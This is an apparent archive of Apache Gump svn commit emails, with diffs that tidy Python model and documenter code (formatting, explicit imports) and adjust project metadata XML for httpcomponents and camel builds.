getLastModified(self): - return self.getStats().getLastModified() - + return self.getStats().getLastModified() + # Get a summary of states for each project - def getProjectSummary(self,summary=None): - + def getProjectSummary(self, summary = None): + # Fails 'cos count into other's summary - # if hasattr(self,'summary'): return self.summary - + # if hasattr(self, 'summary'): return self.summary + if not summary: - summary=ProjectSummary() - + summary = ProjectSummary() + # # Subordinates are projects, so get their summary # for project in self.getProjects(): summary.addState(project.getStatePair()) - + # Fails, see above. # Store for later... # self.summary = summary - + return summary - def dump(self, indent=0, output=sys.stdout): - output.write(getIndent(indent)+'Module : ' + self.name + '\n') - NamedModelObject.dump(self, indent+1, output) + def dump(self, indent = 0, output = sys.stdout): + output.write(getIndent(indent) + 'Module : ' + self.name + '\n') + NamedModelObject.dump(self, indent + 1, output) if self.isPackaged(): - output.write(getIndent(indent+1)+'Packaged Module\n') - + output.write(getIndent(indent + 1) + 'Packaged Module\n') + def hasTag(self): - if self.tag: return True + if self.tag: + return True return False - + def getTag(self): return str(self.tag) - + def getSourceControlStagingDirectory(self): return self.absSrcCtlDir - + def getUpdateLockFile(self): return self.absUpdateLock - + def getWorkingDirectory(self): return self.absWorkingDir - + def getModuleDirName(self): return self.workdir - + def hasUrl(self): - if self.url: return True + if self.url: + return True return False - + def getUrl(self): return self.url - + def hasDescription(self): - if self.desc: return True + if self.desc: + return True return False - + def getDescription(self): - return self.desc - + return self.desc + def getWorkspace(self): return self.workspace - + def getMetadataLocation(self): - return self.metadata - + return self.metadata + def getMetadataViewUrl(self): - location=self.getMetadataLocation() + location = self.getMetadataLocation() if location: - if location.startswith('http'): return location + if location.startswith('http'): + return location # :TODO: Make configurable return 'http://svn.apache.org/repos/asf/gump/metadata/' + location - + def isUpdatable(self): - if self.scm: return True + if self.scm: + return True return False - + # Where the contents (at the repository) Modified? def isModified(self): return self.modified - - def setModified(self,modified): - self.modified=modified - + + def setModified(self, modified): + self.modified = modified + # Where the contents (at the repository) Updated? def isUpdated(self): return self.updated - - def setUpdated(self,updated): - self.updated=updated - + + def setUpdated(self, updated): + self.updated = updated + def hasRepository(self): return self.repository - + def getRepository(self): return self.repository - - def getViewUrl(self): - scm = getScm(self); - if scm: - return scm.getViewUrl() def getScm(self): return self.scm + def getViewUrl(self): + if self.scm: + return self.scm.getViewUrl() + class ModuleStatistics(Statistics): """ Module Statistics Holder """ - def __init__(self,moduleName): - Statistics.__init__(self,moduleName) - self.lastModified=None - + def __init__(self, moduleName): + Statistics.__init__(self, moduleName) + self.lastModified = None + def hasLastModified(self): - if self.lastModified: return True + if self.lastModified: + return True return False - + def getLastModified(self): return self.lastModified - + def getKeyBase(self): - return 'module:'+ self.name - + return 'module:' + self.name + def lastModifiedKey(self): return self.getKeyBase() + '-last-updated' - - def update(self,module): - Statistics.update(self,module) + + def update(self, module): + Statistics.update(self, module) # # Track code updates/changes # if module.isModified(): - self.lastModified=default.datetime + self.lastModified = default.datetime Modified: gump/trunk/python/gump/core/model/repository.py URL: http://svn.apache.org/viewvc/gump/trunk/python/gump/core/model/repository.py?rev=746160&r1=746159&r2=746160&view=diff ============================================================================== --- gump/trunk/python/gump/core/model/repository.py (original) +++ gump/trunk/python/gump/core/model/repository.py Fri Feb 20 06:12:31 2009 @@ -15,166 +15,176 @@ # See the License for the specific language governing permissions and # limitations under the License. -""" - This module contains information on -""" - -from gump.core.model.state import * -from gump.core.model.stats import * +import sys from gump.core.model.object import NamedModelObject - +from gump.core.model.stats import Statable, Statistics from gump.util import getIndent -from gump.util.domutils import * +from gump.util.domutils import getDomChildValue class Repository(NamedModelObject, Statable): """ - + A named repository (CVS|SVN|Perforce|Artifacts|GIT) - + """ - def __init__(self,name,dom,workspace): - NamedModelObject.__init__(self,name,dom,workspace) - - self.url=None - + def __init__(self, name, dom, workspace): + NamedModelObject.__init__(self, name, dom, workspace) + Statable.__init__(self) + + self.url = None + typeToLabel = {'cvs':'CVS', 'svn':'Subversion', 'artifact':'Artifact', 'p4':'Perforce', 'git':'Git'} - type=self.getDomAttributeValue('type') - + type = self.getDomAttributeValue('type') + try: self.type = typeToLabel[type] except: - raise RuntimeError, 'Invalid Repository Type:' + str(xml.type) + raise RuntimeError, 'Invalid Repository Type:' + str(type) - if 'cvs'==type: - self.web=self.getDomChildValue('cvsweb') or \ - self.getDomChildValue('web') + if 'cvs' == type: + self.web = self.getDomChildValue('web') or \ + self.getDomChildValue('cvsweb') if self.hasDomChild('root'): - root=self.getDomChild('root') - self.method=getDomChildValue(root,'method') - self.user=getDomChildValue(root,'user') - self.password=getDomChildValue(root,'password') - self.path=getDomChildValue(root,'path') - self.hostname=getDomChildValue(root,'hostname') + root = self.getDomChild('root') + self.method = getDomChildValue(root, 'method') + self.user = getDomChildValue(root, 'user') + self.password = getDomChildValue(root, 'password') + self.path = getDomChildValue(root, 'path') + self.hostname = getDomChildValue(root, 'hostname') else: raise RuntimeError, 'No XML <root on repository: ' \ + self.getName() - elif 'p4'==type: + elif 'p4' == type: if self.hasDomChild('root'): - root=self.getDomChild('root') - self.p4port=getDomChildValue(root,'hostname') + root = self.getDomChild('root') + self.p4port = getDomChildValue(root, 'hostname') else: raise RuntimeError, 'No Perforce server on P4 repository: ' \ + self.getName() - self.web=self.getDomChildValue('web') + self.web = self.getDomChildValue('web') else: if self.hasDomChild('url'): - self.url=self.getDomChildValue('url') + self.url = self.getDomChildValue('url') else: raise RuntimeError, 'No URL on ' + self.type + ' repository: ' \ + self.getName() - self.web=self.getDomChildValue('web') - self.user=self.getDomChildValue('user') - self.password=self.getDomChildValue('password') - + self.web = self.getDomChildValue('web') + self.user = self.getDomChildValue('user') + self.password = self.getDomChildValue('password') + # Modules referencing this repository - self.modules=[] - - def complete(self,workspace): + self.modules = [] + + def complete(self, workspace): pass - - def check(self,workspace): + + def check(self, workspace): if not self.hasModules(): self.addWarning('Unused Repository (not referenced by modules)') - + def hasModules(self): - if self.modules: return True + if self.modules: + return True return False - + def hasType(self): - if self.type: return True + if self.type: + return True return False - + def getType(self): return self.type - + def getModules(self): return self.modules - - def dump(self, indent=0, output=sys.stdout): - output.write(getIndent(indent)+'Repository : ' + self.name + '\n') - NamedModelObject.dump(self,indent+1,output) - + + def dump(self, indent = 0, output = sys.stdout): + output.write(getIndent(indent) + 'Repository : ' + self.name + '\n') + NamedModelObject.dump(self, indent + 1, output) + def hasTitle(self): return self.hasDomAttribute('title') - + def hasHomePage(self): return self.hasDomAttribute('home-page') - + def hasWeb(self): return self.web def isRedistributable(self): # Existence means 'true' return self.hasDomChild('redistributable') - + def hasUser(self): - if hasattr(self,'user'): - if self.user: return True + if hasattr(self, 'user'): + if self.user: + return True return False - def hasPassword(self): - if hasattr(self,'password'): - if self.password: return True + + def hasPassword(self): + if hasattr(self, 'password'): + if self.password: + return True return False - + def hasPath(self): - if hasattr(self,'path'): - if self.path: return True + if hasattr(self, 'path'): + if self.path: + return True return False - + def hasMethod(self): - if hasattr(self,'method'): - if self.method: return True + if hasattr(self, 'method'): + if self.method: + return True return False - + def hasHostname(self): - if hasattr(self,'hostname'): - if self.hostname: return True + if hasattr(self, 'hostname'): + if self.hostname: + return True return False - - def getTitle(self): return self.getDomAttributeValue('title') - def getHomePage(self): return self.getDomAttributeValue('home-page') - def getWeb(self): return self.web - - def getUser(self): return self.user - def getPassword(self): return self.password - def getPath(self): return self.path - def getMethod(self): return self.method - def getHostname(self): return self.hostname - + + def getTitle(self): + return self.getDomAttributeValue('title') + def getHomePage(self): + return self.getDomAttributeValue('home-page') + def getWeb(self): + return self.web + + def getUser(self): + return self.user + def getPassword(self): + return self.password + def getPath(self): + return self.path + def getMethod(self): + return self.method + def getHostname(self): + return self.hostname + def hasUrl(self): - if self.url: return True + if self.url: + return True return False - + def getUrl(self): return self.url - - def addModule(self,module): + + def addModule(self, module): self.modules.append(module) - - def getModules(self): - return self.modules - + class RepositoryStatistics(Statistics): """ - Statistics Holder + Statistics Holder """ - def __init__(self,repositoryName): - Statistics.__init__(self,repositoryName) + def __init__(self, repositoryName): + Statistics.__init__(self, repositoryName) def getKeyBase(self): - return 'repository:'+ self.name - - + return 'repository:'+ self.name + + From [email protected] Fri Feb 20 08:07:52 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 81081 invoked from network); 20 Feb 2009 08:07:52 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 20 Feb 2009 08:07:52 -0000 Received: (qmail 60684 invoked by uid 500); 20 Feb 2009 08:07:52 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.gump.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 60675 invoked by uid 99); 20 Feb 2009 08:07:52 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 20 Feb 2009 00:07:52 -0800 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 20 Feb 2009 08:07:50 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 4D40E238896B; Fri, 20 Feb 2009 08:07:29 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r746176 - /gump/metadata/project/httpcomponents.xml Date: Fri, 20 Feb 2009 08:07:29 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: bodewig Date: Fri Feb 20 08:07:28 2009 New Revision: 746176 URL: http://svn.apache.org/viewvc?rev=746176&view=rev Log: adapt verision, likely to change again in few days Modified: gump/metadata/project/httpcomponents.xml Modified: gump/metadata/project/httpcomponents.xml URL: http://svn.apache.org/viewvc/gump/metadata/project/httpcomponents.xml?rev=746176&r1=746175&r2=746176&view=diff ============================================================================== --- gump/metadata/project/httpcomponents.xml (original) +++ gump/metadata/project/httpcomponents.xml Fri Feb 20 08:07:28 2009 @@ -49,10 +49,10 @@ <home nested="httpcore" /> <jar id="module-main" - name="module-main/target/httpcore-4.0-beta4-SNAPSHOT.jar" + name="module-main/target/httpcore-4.0.jar" /> <jar id="module-nio" - name="module-nio/target/httpcore-nio-4.0-beta4-SNAPSHOT.jar" + name="module-nio/target/httpcore-nio-4.0.jar" /> <!-- tests are not supposed to be run in this project, but they are... --> From [email protected] Fri Feb 20 08:09:42 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 81925 invoked from network); 20 Feb 2009 08:09:42 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 20 Feb 2009 08:09:42 -0000 Received: (qmail 61701 invoked by uid 500); 20 Feb 2009 08:09:42 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.gump.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 61692 invoked by uid 99); 20 Feb 2009 08:09:42 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 20 Feb 2009 00:09:42 -0800 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 20 Feb 2009 08:09:40 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 70FAA238896B; Fri, 20 Feb 2009 08:09:19 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r746177 - /gump/metadata/project/camel.xml Date: Fri, 20 Feb 2009 08:09:19 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: bodewig Date: Fri Feb 20 08:09:19 2009 New Revision: 746177 URL: http://svn.apache.org/viewvc?rev=746177&view=rev Log: maybe a different goal will make the project create anything Modified: gump/metadata/project/camel.xml Modified: gump/metadata/project/camel.xml URL: http://svn.apache.org/viewvc/gump/metadata/project/camel.xml?rev=746177&r1=746176&r2=746177&view=diff ============================================================================== --- gump/metadata/project/camel.xml (original) +++ gump/metadata/project/camel.xml Fri Feb 20 08:09:19 2009 @@ -29,7 +29,7 @@ <description>Camel acf:4db6:5e0b:f386:43a5:35d7:718d:3c8b Core</description> <url href="http://activemq.apache.org/"/> - <mvn basedir="camel-core" goal="install" separateLocalRepository="true"> + <mvn basedir="camel-core" separateLocalRepository="true"> <property name="maven.test.skip" value="true"/> </mvn> From [email protected] Sun Feb 22 15:17:06 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 52933 invoked from network); 22 Feb 2009 15:17:06 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 22 Feb 2009 15:17:06 -0000 Received: (qmail 32071 invoked by uid 500); 22 Feb 2009 15:17:06 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.gump.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 32062 invoked by uid 99); 22 Feb 2009 15:17:05 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 22 Feb 2009 07:17:05 -0800 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 22 Feb 2009 15:17:03 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 81BF923888F4; Sun, 22 Feb 2009 15:16:37 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r746727 [1/2] - /gump/trunk/python/gump/actor/document/xdocs/documenter.py Date: Sun, 22 Feb 2009 15:16:25 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: bodewig Date: Sun Feb 22 15:16:25 2009 New Revision: 746727 URL: http://svn.apache.org/viewvc?rev=746727&view=rev Log: PyLint cleanup: whitespace, wildcard imports, unused variables, strings module Modified: gump/trunk/python/gump/actor/document/xdocs/documenter.py From [email protected] Sun Feb 22 15:17:18 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 52969 invoked from network); 22 Feb 2009 15:17:18 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 22 Feb 2009 15:17:18 -0000 Received: (qmail 32127 invoked by uid 500); 22 Feb 2009 15:17:18 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.gump.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 32118 invoked by uid 99); 22 Feb 2009 15:17:18 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 22 Feb 2009 07:17:18 -0800 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 22 Feb 2009 15:17:08 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id E2D9223889C0; Sun, 22 Feb 2009 15:16:40 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r746727 [2/2] - /gump/trunk/python/gump/actor/document/xdocs/documenter.py Date: Sun, 22 Feb 2009 15:16:25 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Modified: gump/trunk/python/gump/actor/document/xdocs/documenter.py URL: http://svn.apache.org/viewvc/gump/trunk/python/gump/actor/document/xdocs/documenter.py?rev=746727&r1=746726&r2=746727&view=diff ============================================================================== --- gump/trunk/python/gump/actor/document/xdocs/documenter.py (original) +++ gump/trunk/python/gump/actor/document/xdocs/documenter.py Sun Feb 22 15:16:25 2009 @@ -6,9 +6,9 @@ # The ASF licenses this file to You under the Apache License, Version 2.0 # (the "License"); you may not use this file except in compliance with # the License. You may obtain a copy of the License at -# +# # http://www.apache.org/licenses/LICENSE-2.0 -# +# # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. @@ -20,665 +20,710 @@ XDOC generation. """ -import socket -import time import os +import StringIO import sys -import logging -from string import lower,replace -from xml.sax.saxutils import escape +import time from shutil import copyfile +from xml.sax.saxutils import escape from gump import log -from gump.core.config import * from gump.actor.document.documenter import Documenter from gump.actor.document.text.documenter import TextDocumenter -from gump.actor.document.xdocs.xdoc import * -from gump.actor.document.xdocs.resolver import * -from gump.util import * -from gump.util.timing import * -from gump.util.tools import syncDirectories,copyDirectories,wipeDirectoryTree - +from gump.actor.document.xdocs.config import XDocConfig +from gump.actor.document.xdocs.resolver import XDocResolver, \ + getDepthForObject, getRelativeLocation +from gump.actor.document.xdocs.xdoc import XDocDocument +from gump.core.config import default, dir, setting from gump.core.language.path import AnnotatedPath - -from gump.core.model.stats import * -from gump.core.model.project import ProjectStatistics -from gump.core.model.state import * -from gump.core.model.workspace import Workspace -from gump.core.model.module import Module -from gump.core.model.project import Project from gump.core.model.misc import Resultable - +from gump.core.model.project import Project +from gump.core.model.state import REASON_BUILD_FAILED, REASON_PACKAGE, \ + REASON_UNSET, reasonDescription, STATE_COMPLETE, STATE_FAILED, \ + STATE_PREREQ_FAILED, STATE_SUCCESS, STATE_UNSET, stateDescription, stateName +from gump.core.model.stats import INSIGNIFICANT_DURATION, SIGNIFICANT_DURATION +from gump.core.model.workspace import Workspace from gump.tool.guru.stats import StatisticsGuru from gump.tool.guru.xref import XRefGuru +from gump.tool.shared.comparator import compareProjectsByFullDependeeCount +from gump.util import createOrderedList, getBeanAttributes, gumpSafeName, \ + inspectGarbageCollection +from gump.util.note import Annotatable, levelName +from gump.util.timing import getGeneralSinceDescription, secsToElapsedTimeString +from gump.util.tools import syncDirectories, copyDirectories, wipeDirectoryTree +from gump.util.work import CommandWorkItem, TimedWorkItem, Workable, \ + workTypeName -from gump.core.run.gumprun import * - -from gump.tool.shared.comparator import * - class XDocDocumenter(Documenter): - + def __init__(self, run, dirBase, urlBase): - Documenter.__init__(self, run) - + Documenter.__init__(self, run) + # Configuration can be overridden to be # XDOCS, not the default of XHTML. - self.config=XDocConfig(not run.getOptions().isXDocs()) - - resolver=XDocResolver(dirBase,urlBase,self.config) - self.setResolver(resolver) - + self.config = XDocConfig(not run.getOptions().isXDocs()) + + resolver = XDocResolver(dirBase, urlBase, self.config) + self.setResolver(resolver) + def prepareRun(self): - + log.debug('--- Prepare for Documenting Results') # Seed with default/site skins/etc. self.prepareXDoc() - - def processModule(self,module): - verbose=self.run.getOptions().isVerbose() - debug=self.run.getOptions().isDebug() - self.documentModule(module,True) + + def processModule(self, module): + self.documentModule(module, True) self.syncObject(module) - - def processProject(self,project): - - verbose=self.run.getOptions().isVerbose() - debug=self.run.getOptions().isDebug() - self.documentProject(project,True) - + + def processProject(self, project): + self.documentProject(project, True) self.syncObject(project) - + # Do once every ... if 0 == (project.getPositionIndex() % 5): - self.documentBuildLog(True) + self.documentBuildLog(True) self.syncBuildLog() - + def documentRun(self): - + log.debug('--- Documenting Results') # Document... - self.documentRunDetails() - self.documentWorkspace() + self.documentRunDetails() + self.documentWorkspace() self.documentEverythingElse() - + # Once a day... if self.run.getOptions().isOfficial(): self.documentStatistics() self.documentXRef() - + ##################################################################### # # XDocing... def getXDocWorkDirectory(self): - if hasattr(self,'workDir'): return self.workDir - wdir=os.path.abspath(os.path.join( - self.workspace.getBaseDirectory(),'xdocs-work')) + if hasattr(self, 'workDir'): + return self.workDir + wdir = os.path.abspath(os.path.join( + self.workspace.getBaseDirectory(), 'xdocs-work')) if self.config.isXdocs(): - wdir=os.path.abspath(os.path.join(wdir,'content')) + wdir = os.path.abspath(os.path.join(wdir, 'content')) if not os.path.exists(wdir): - os.makedirs(wdir) - self.workDir=wdir + os.makedirs(wdir) + self.workDir = wdir return self.workDir - + def getXDocLogDirectory(self): - if hasattr(self,'logDir'): return self.logDir - ldir=self.workspace.getLogDirectory() + if hasattr(self, 'logDir'): + return self.logDir + ldir = self.workspace.getLogDirectory() if self.config.isXdocs(): - ldir=os.path.abspath(os.path.join(ldir,'content')) + ldir = os.path.abspath(os.path.join(ldir, 'content')) if not os.path.exists(ldir): - os.makedirs(ldir) - self.logDir=ldir + os.makedirs(ldir) + self.logDir = ldir return self.logDir - + def getXDocTemplateDirectory(self): - """ Template (XDoc skin/config) """ - templateName='forrest' + """ Template (XDoc skin/config) """ + templateName = 'forrest' if self.config.isXhtml(): - templateName='xhtml' - fdir=os.path.abspath(os.path.join(dir.template,templateName)) + templateName = 'xhtml' + fdir = os.path.abspath(os.path.join(dir.template, templateName)) if self.config.isXdocs(): - fdir=os.path.abspath(os.path.join(fdir,'content')) - return fdir - + fdir = os.path.abspath(os.path.join(fdir, 'content')) + return fdir + def getXDocSiteTemplateDirectory(self): - """ Site Template (XDoc skin/config tweaks) """ - templateName='site-forrest' + """ Site Template (XDoc skin/config tweaks) """ + templateName = 'site-forrest' if self.config.isXhtml(): - templateName='site-xhtml' - fdir=os.path.abspath(os.path.join(dir.template,templateName)) + templateName = 'site-xhtml' + fdir = os.path.abspath(os.path.join(dir.template, templateName)) if self.config.isXdocs(): - fdir=os.path.abspath(os.path.join(fdir,'content')) - return fdir - - def prepareXDoc(self): - """ - + fdir = os.path.abspath(os.path.join(fdir, 'content')) + return fdir + + def prepareXDoc(self): + """ + Copy the main template (perhaps with site tweaks) to prepare - - """ - log.info('Prepare XDoc work with template') - xdocLogDir=self.getXDocLogDirectory() - + + """ + log.info('Prepare XDoc work with template') + # First deleted the work tree (if exists), then ensure created - xdocWorkDir=self.getXDocWorkDirectory() + xdocWorkDir = self.getXDocWorkDirectory() wipeDirectoryTree(xdocWorkDir) - + # Sync in the defaults [i.e. cleans also] - xdocTemplate=self.getXDocTemplateDirectory() - syncDirectories( xdocTemplate, \ - xdocWorkDir, \ - self.workspace) - - # Copy over the local site defaults (if any) - xdocSiteTemplate=self.getXDocSiteTemplateDirectory() + xdocTemplate = self.getXDocTemplateDirectory() + syncDirectories(xdocTemplate, + xdocWorkDir, + self.workspace) + + # Copy over the local site defaults (if any) + xdocSiteTemplate = self.getXDocSiteTemplateDirectory() if os.path.exists(xdocSiteTemplate): - log.info('Prepare XDoc work with *site* template') - copyDirectories(xdocSiteTemplate, \ - xdocWorkDir, \ - self.workspace) - - def syncObject(self,object): + log.info('Prepare XDoc work with *site* template') + copyDirectories(xdocSiteTemplate, + xdocWorkDir, + self.workspace) + + def syncObject(self, obj): # Get relative path - objDir=self.resolver.getDirectoryRelativePath(object).serialize() - + objDir = self.resolver.getDirectoryRelativePath(obj).serialize() + # Get relative to (1) work [source] (2) log [target] & sync - + # Move xdocs from work directory to log - xdocWorkDir=self.getXDocWorkDirectory() - logDirectory=self.getXDocLogDirectory() - - workContents=os.path.abspath(os.path.join(xdocWorkDir,objDir)) - logContents=os.path.abspath(os.path.join(logDirectory,objDir)) - - success=True + xdocWorkDir = self.getXDocWorkDirectory() + logDirectory = self.getXDocLogDirectory() + + workContents = os.path.abspath(os.path.join(xdocWorkDir, objDir)) + logContents = os.path.abspath(os.path.join(logDirectory, objDir)) + + success = True try: - if os.path.exists(workContents): + if os.path.exists(workContents): # Sync over public pages... - copyDirectories(workContents,logContents) - except: - log.error('--- Failed to sync ['+`objDir`+'] (work->log)', exc_info=1) - success=False - - if self.config.isXdocs(): + copyDirectories(workContents, logContents) + except: + log.error('--- Failed to sync [' + `objDir` + '] (work->log)', + exc_info = 1) + success = False + + if self.config.isXdocs(): # Move contents/xdocs from work directory to log # (Note: Forrest has contents/X and contents/xdocs/X) - xdocWorkDir=os.path.abspath(os.path.join(xdocWorkDir,'xdocs')) - logDirectory=os.path.abspath(os.path.join(logDirectory,'xdocs')) - - workContents=os.path.abspath(os.path.join(xdocWorkDir,objDir)) - logContents=os.path.abspath(os.path.join(logDirectory,objDir)) - + xdocWorkDir = os.path.abspath(os.path.join(xdocWorkDir, 'xdocs')) + logDirectory = os.path.abspath(os.path.join(logDirectory, 'xdocs')) + + workContents = os.path.abspath(os.path.join(xdocWorkDir, objDir)) + logContents = os.path.abspath(os.path.join(logDirectory, objDir)) + try: - if os.path.exists(workContents): + if os.path.exists(workContents): # Sync over public pages... - copyDirectories(workContents,logContents) - except: - log.error('--- Failed to sync xdocs ['+`objDir`+'] (work->log)', exc_info=1) - success=False - + copyDirectories(workContents, logContents) + except: + log.error('--- Failed to sync xdocs [' + `objDir` + \ + '] (work->log)', exc_info = 1) + success = False + return success - - def syncBuildLog(self): - - logSpec=self.resolver.getFileSpec(self.workspace, 'buildLog') - - xdocWorkDir=self.getXDocWorkDirectory() - logDirectory=self.getXDocLogDirectory() - - if self.config.isXdocs(): + + def syncBuildLog(self): + + logSpec = self.resolver.getFileSpec(self.workspace, 'buildLog') + + xdocWorkDir = self.getXDocWorkDirectory() + logDirectory = self.getXDocLogDirectory() + + if self.config.isXdocs(): # Move contents/xdocs from work directory to log # (Note: Forrest has contents/X and contents/xdocs/X) - xdocWorkDir=os.path.abspath(os.path.join(xdocWorkDir,'xdocs')) - logDirectory=os.path.abspath(os.path.join(logDirectory,'xdocs')) - + xdocWorkDir = os.path.abspath(os.path.join(xdocWorkDir, 'xdocs')) + logDirectory = os.path.abspath(os.path.join(logDirectory, 'xdocs')) + # Current status - logSource=os.path.abspath( - os.path.join(xdocWorkDir,logSpec.getDocument())) - logTarget=os.path.abspath( - os.path.join(logDirectory,logSpec.getDocument())) - + logSource = os.path.abspath( + os.path.join(xdocWorkDir, logSpec.getDocument())) + logTarget = os.path.abspath( + os.path.join(logDirectory, logSpec.getDocument())) + # Do the transfer.. - success=True + success = True try: - log.debug('Copy %s to %s' % ( logSource, logTarget)) - copyfile(logSource,logTarget) - except: - log.error('--- Failed to sync buildLog work->log', exc_info=1) - success=False - + log.debug('Copy %s to %s' % (logSource, logTarget)) + copyfile(logSource, logTarget) + except: + log.error('--- Failed to sync buildLog work->log', exc_info = 1) + success = False + return success - - ##################################################################### + + ##################################################################### # # Workspace Pieces - # + # def documentRunDetails(self): - + # # ---------------------------------------------------------------------- # # Index.xml - # - spec=self.resolver.getFileSpec(self.run) - - document=XDocDocument('Gump Run', - spec.getFile() , - self.config, - spec.getRootPath()) - - definitionSection=document.createSection('Run Details') - + # + spec = self.resolver.getFileSpec(self.run) + + document = XDocDocument('Gump Run', + spec.getFile(), + self.config, + spec.getRootPath()) + + definitionSection = document.createSection('Run Details') + if not self.gumpSet.isFull(): self.documentPartial(definitionSection) - definitionTable=definitionSection.createTable() + definitionTable = definitionSection.createTable() definitionTable.createEntry('Gump Run GUID', self.run.getRunGuid()) - definitionTable.createEntry('Gump Run (Hex) GUID', self.run.getRunHexGuid()) + definitionTable.createEntry('Gump Run (Hex) GUID', + self.run.getRunHexGuid()) definitionTable.createEntry('Gump Version', setting.VERSION) - + # RSS|Atom|RDF - self.documentXMLLinks(document, definitionTable, depth=getDepthForObject(self.workspace)) - - #rdfUrl=self.resolver.getUrl(self.workspace,'gump','.rdf') - #rdfArea.createFork('http://www.feedvalidator.org/check.cgi?url=' + rdfUrl) \ - # .createIcon(self.resolver.getImageUrl('valid-rdf.png'), alt='[Valid Atom]') #, title='Validate my Atom feed', width='88', height='31') - - self.documentSummary(document,self.workspace.getProjectSummary()) - - dtSection=definitionSection.createSection('Dates/Times') - dtTable=dtSection.createTable() + self.documentXMLLinks(document, definitionTable, + depth = getDepthForObject(self.workspace)) + + #rdfUrl = self.resolver.getUrl(self.workspace, 'gump', '.rdf') + #rdfArea.createFork('http://www.feedvalidator.org/check.cgi?url=' + \ + # rdfUrl)\ + # .createIcon(self.resolver\ + # .getImageUrl('valid-rdf.png'), + # alt='[Valid Atom]') + #, title='Validate my Atom feed', + #width='88', height='31') + + self.documentSummary(document, self.workspace.getProjectSummary()) + + dtSection = definitionSection.createSection('Dates/Times') + dtTable = dtSection.createTable() dtTable.createEntry('@@DATE@@', default.date_s) - dtTable.createEntry('Start Date/Time (UTC)', self.run.getStart().getUtc()) + dtTable.createEntry('Start Date/Time (UTC)', + self.run.getStart().getUtc()) dtTable.createEntry('End Date/Time (UTC)', self.run.getEnd().getUtc()) dtTable.createEntry('Timezone', self.run.getEnvironment().getTimezone()) dtTable.createEntry('Start Date/Time', self.run.getStart().getLocal()) dtTable.createEntry('End Date/Time', self.run.getEnd().getLocal()) dtTable.createEntry('Elapsed Time', self.run.getElapsedTimeString()) - 